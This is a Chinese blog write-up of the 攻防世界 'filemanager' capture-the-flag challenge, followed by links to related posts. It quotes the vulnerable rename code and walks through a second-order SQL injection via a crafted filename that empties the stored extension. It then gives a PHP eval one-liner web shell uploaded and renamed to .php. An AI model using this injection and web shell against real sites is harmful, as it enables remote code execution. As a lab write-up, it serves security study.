攻防世界 WEB filemanager

最新推荐文章于 2024-06-01 16:50:01 发布
最新推荐文章于 2024-06-01 16:50:01 发布
阅读量1k 收藏
点赞数
分类专栏: 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120515971
版权

web安全

这题有源码泄露,先扫一波,dirsearch -u http://111.200.241.244:58290/
扫出来var.www.gz,下下来分析,直接上有错误的sql注入点吧,在rename.php里面,在rename的时候并没有对文件后缀进行检验,特殊字符也没有过滤,那么这里就是注入点

if ($result) {

		$req['newname'] = basename($req['newname']);
		$re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");
		if (!$re) {
			print_r($db->error);
			exit;
		}
		$oldname = UPLOAD_DIR . $result["filename"] . $result["extension"];
		$newname = UPLOAD_DIR . $req["newname"] . $result["extension"];
		if (file_exists($oldname)) {
			rename($oldname, $newname);
		}
		$url = "/" . $newname;
		echo "Your file is rename, url:
                <a href=\"{$url}\" target='_blank'>{$url}</a><br/>
                <a href=\"/\">go back</a>";
	}

upload.php
sql语句进行了addslashes(),sql语句

$sql = "select * from `file` where `filename`='{$path_parts['filename']}' and `extension`='{$path_parts['extension']}'";

下面开始分析
首先上传一个空的后缀名为jpg的文件,由于有数据库的结构,我们带一个extension进去’,extension=’.jpg
这样在上传的时候就可以过过滤,然后进行rename,将’,extension=’,替换成upload.jpg,执行了

update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}

相当于执行了

update `file` set `filename`='upload.jpg', `oldname`='',extension='' where `fid`={$result['fid']}

那么原来的’,extension=’.jpg相当于变为了upload.jpg.jpg(实际上),upload.jpg是他的文件名,其实这里数据库里extension已经变为空了(数据库里filename存的是upload.jpg,extension是空),而upload文件夹里却还是upload.jpg.jpg文件
然后就是再上传一个一句话<?php eval($_POST['nihao']);?>,命名为upload.jpg,此时这个文件是有后缀的.jpg,文件名是upload
然后最后一步,把文件名为upload.jpg变为upload.php,由于之前数据库里我们已经把extension变为空了,所以oldname匹配到是我们上传木马的文件,而不是原来的文件,具体过程结合源码想一下就明白了
所以最后蚁剑就好
参考视频链接:https://www.bilibili.com/video/BV1XP4y1h7qk?spm_id_from=333.999.0.0

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 web高手进阶区 8分 filemanager
闵行小鱼塘
10-04 1156
继续ctf的旅程,开始攻防世界web高手进阶区的8分,本文是filemanager的writeup
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界--filemanager
qq_46263951的博客
01-05 1283
看到这里猜测是个文件上传漏洞,测试几次发现好像只能上传图片,rename只能更改文件名,但无法更改后缀。 随手扫了一下发现源码泄漏, 审阅rename代码 <?php /** * Created by PhpStorm. * User: phithon * Date: 15/10/14 * Time: 下午9:39 */ require_once "common.inc.php"; if (isset($req['oldname']) && isset..
攻防世界-WEB-filemanager
最新发布
m0_52061428的博客
06-01 964
人道是,我心错付情深处,以为两情皆如初。奈何春风扶柳意,独我梦中空自舞。许久未见诸位,这段时间由于学业与其他事情,便没再继续写下去(其实很大一部分归咎于自己的懒惰//DOGE)这次带来一道开胃小菜,希望能够帮到各位师傅们,也希望得到大家的指点。
攻防世界-filemanager
weixin_53150482的博客
09-28 1106
攻防世界-filemanager
XDCTF 2015 Filemanager攻防世界web
weixin_43610673的博客
07-22 1515
看似文件上传,其实主要是利用sql注入修改指定文件名再数据库中的后缀名为空 /www.tar.gz 下载源码审计 数据库的字段结构为 同时代码中由于白名单限制,所以无法上传恶意文件,由于版本限制也不能用%00截断,但有一个rename功能,只能修改文件名,但可以通过sql注入,影响其extension为空,再修改文件时加上.php后缀 先上传一个用来sql注入的文件 修改文件名 新的文件名为test2.txt.txt 但数据库中经过update语句 update `file` set `file
【愚公系列】2023年06月 攻防世界-Webfilemanager
时光隧道
06-20 7176
如果PHP源码泄露,那么攻击者可以轻易地查看其中的代码并发现其中的漏洞和安全弱点。这可能导致攻击者能够从中获得敏感信息或者对网站进行攻击。以下是一些可以避免PHP源码泄露的建议:保护PHP源码文件:确保PHP源代码文件存储在一个安全的目录中,并且不能被通过URL访问。最好的方法是将代码文件存储在Web服务器的非公共目录中。禁止目录浏览:在Web服务器上,确保禁止目录浏览功能。这意味着攻击者不能通过URL访问网站上的任何文件和目录。防止PHP错误输出:确保禁用PHP错误输出功能。
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此详细解博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的目,这道目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此详细解博客:https://blog.csdn.net/m0_59188912/article/details/127861757
FileManager
06-28
WEB文件管理系统,它的主要功能是用户在系统中注册成功后,可以上传文件到系统中,并可以对文件进行管理。
[其他类别]精美的WEB在线文件管理(狐狸修改版)源码_foxwebfilemanager.zip
12-18
源码参考,欢迎下载
IZWebFileManager-开源
04-24
IZWebFileManager具有针对ASP.NET 2的文件管理器控件,可与MS-Internet Explorer和Firefox等最常用的浏览器兼容。
caddy_web服务器(添加filemanager版本)
01-14
不知道为什么 caddy web 服务器官网把 filemanager 插件干掉了,这是我之前下载的Linux 64位环境下只带 filemanager 插件的版本,自己一直在用这个,感觉很方便,希望对大家有帮助; 版本号:caddy_v0.11.1_linux_amd64_custom_personal; 对应博客地址:https://blog.csdn.net/TMT123421/article/details/82740660;
攻防世界 web进阶区 filemanger
m0_51395584的博客
06-14 1020
攻防世界 filemanger 文件上传 木马后门
YesFInder - Web File Manager 网页文件管理系统
weixin_34391445的博客
12-05 243
开发原由: 原来想找一下实现可视化图片上传程序,先找了ckfinder,发现居然是收费的,而且用起来也不顺手,于是想能不能自己写一个。想到这就立即动手,花2天时间完成初步功能,然后再花了3天完善。目前实现了基本功能,现发步出来,供大家参考。 目前实现的功能: 文件上传、下载、改名、删除;目录的新建和改名。可选显示文件时间和文件大小。 使用方法: 可单独使用,也可配合xhEditor等在线...
Webmin -- File Manager模块
yuyuyuliang00的博客
08-22 425
linux webmin File manager
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值